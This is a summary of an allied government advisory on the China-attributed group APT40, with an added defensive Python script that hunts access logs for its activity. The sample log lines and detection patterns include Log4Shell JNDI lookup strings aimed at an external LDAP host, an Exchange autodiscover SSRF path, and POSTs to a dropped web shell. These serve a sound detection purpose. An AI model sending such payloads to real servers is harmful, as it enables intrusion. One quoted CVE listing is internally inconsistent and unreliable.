An advisory led by Australia and co-signed by government agencies from the US, Canada, New Zealand, Japan, South Korea, the UK, and Germany describes the tradecraft of the China-aligned threat actor APT40, also tracked as Kryptonite Panda, GINGHAM TYPHOON, Leviathan, and Bronze Mohawk. The group, which the advisory attributes to the PRC Ministry of State Security, prioritizes turning newly disclosed vulnerabilities into working exploits and deploying them quickly. It runs regular reconnaissance against networks of interest to find unpatched or obsolete devices, so that a fresh exploit can be used against them before defenders patch.
APT40 favours widely known vulnerabilities such as Log4Shell in Log4j and the 2021 Microsoft Exchange flaws, and it routinely compromises end-of-life small-office/home-office (SOHO) devices to use as operational infrastructure, so that its attack traffic blends in with legitimate activity. Once inside, the group deploys web shells and hunts for valid user credentials to maintain persistent access, and ultimately installs malware to exfiltrate data.
The advisory lists mitigations that defend against this tradecraft: comprehensive logging, patch management, network segmentation, multifactor authentication, disabling unused network services, web application firewalls, least-privilege access, and replacement of end-of-life equipment. It also links to ten malware samples attributed to APT40 and two case studies, although the indicators in them may now be dated. Much of this material stems from the Australian Cyber Security Centre's 2022 investigation of an APT40 intrusion at an Australian organisation.
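Two of the mitigations above (logging and patching) only pay off if someone actually looks at the logs for the activity described in this summary: Log4Shell probes, abuse of the Exchange autodiscover path, and POSTs to a freshly dropped web shell. The following is an added example, not code from the advisory or from the article: a small Python hunting script run over a handful of constructed access-log lines (combined log format, RFC 5737 documentation addresses). The matching patterns are the widely published indicators for CVE-2021-44228 and the ProxyShell-style autodiscover SSRF, plus the assumption that nothing under `/aspnet_client/` should ever be a POST target on an Exchange front end; tune the allowlist to your own server before relying on that last rule.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). These are
# illustrative only and are not taken from the advisory or any real incident.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jul/2024:08:01:11 +0000] "GET /owa/auth/logon.aspx HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jul/2024:08:01:15 +0000] "GET /autodiscover/autodiscover.json?a@x.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3Fa@x.com HTTP/1.1" 200 1024 "-" "python-requests/2.28"
198.51.100.23 - - [10/Jul/2024:08:02:40 +0000] "GET /api/login?user=${jndi:ldap://198.51.100.23:1389/a} HTTP/1.1" 500 0 "-" "curl/7.88"
198.51.100.23 - - [10/Jul/2024:08:02:41 +0000] "GET /api/login?user=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fa%7D HTTP/1.1" 500 0 "-" "curl/7.88"
203.0.113.7 - - [10/Jul/2024:08:03:02 +0000] "POST /aspnet_client/system_web/ffd2.aspx HTTP/1.1" 200 312 "-" "python-requests/2.28"
203.0.113.7 - - [10/Jul/2024:08:03:05 +0000] "POST /aspnet_client/system_web/ffd2.aspx HTTP/1.1" 200 2904 "-" "python-requests/2.28"
192.0.2.55 - - [10/Jul/2024:08:04:00 +0000] "GET /owa/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD path proto", status, size, "referer", "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Public indicators: the Log4Shell lookup prefix (CVE-2021-44228) and the
# ProxyShell-style autodiscover SSRF path with an embedded '@' (CVE-2021-34473).
LOG4SHELL_RE = re.compile(r'\$\{jndi:')
PROXYSHELL_RE = re.compile(r'/autodiscover/autodiscover\.json\?[^ ]*@')
# Assumption for this example: /aspnet_client/ serves static files only, so a
# POST to an .aspx handler beneath it indicates a dropped web shell.
WEBSHELL_DIR_RE = re.compile(r'^/aspnet_client/.*\.aspx$', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def normalize(s):
    """Undo common evasions before matching: repeated URL-decoding and the
    ${lower:x}/${upper:x} lookup trick used to split the literal 'jndi'."""
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r'\$\{(?:lower|upper):(\w)\}', r'\1', s, flags=re.IGNORECASE)
    return s.lower()


def classify(entry):
    """Return the names of every rule that fires on one parsed entry."""
    hits = []
    path = normalize(entry["path"])
    if LOG4SHELL_RE.search(path):
        hits.append("log4shell-jndi-lookup")
    if PROXYSHELL_RE.search(path):
        hits.append("exchange-autodiscover-ssrf")
    if entry["method"] == "POST" and WEBSHELL_DIR_RE.match(path.split("?")[0]):
        hits.append("possible-webshell-post")
    return hits


def scan(log_text):
    """Run every rule over every parseable line and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for rule in classify(entry):
            findings.append({"rule": rule, "ip": entry["ip"],
                             "ts": entry["ts"], "path": entry["path"]})
    return findings


def by_source(findings):
    """Count findings per client address; one noisy source is a good pivot."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f['ts']} {f['ip']:<15} {f['rule']:<28} {f['path'][:60]}")
    print(dict(by_source(results)))
```

On the constructed sample the script reports five findings from two addresses: the Exchange SSRF followed by two POSTs to the same unexpected `.aspx` from 203.0.113.7 (the sequence a web-shell drop would leave), and two Log4Shell probes from 198.51.100.23, one of them URL-encoded. The decoding and `${lower:x}` handling in `normalize` matters because real probes rarely arrive in the plain form; extend it for other lookup tricks you see in your own traffic.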
"The advisory is the result, and suggests that APT40 'possesses the capability to rapidly transform and adapt exploit proof-of-concept(s) (POCs) of new vulnerabilities and immediately utilize them against target networks possessing the infrastructure of the associated vulnerability.' The gang also watches networks of interest to look for unpatched targets."
"...Some of the vulns APT40 targets are old news – Log4J (CVE-2021-44228), Atlassian Confluence (CVE-2021-31207, CVE-2021-26084) and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473) are high on the hit list."
"The advisory outlines mitigation tactics that are said to offer decent defences against APT40. They're not rocket science: logging, patch management, and network segmentation are all listed.
So are multifactor authentication, disabling unused network services, use of web application firewalls, least privilege access, and replacement of end-of-life equipment."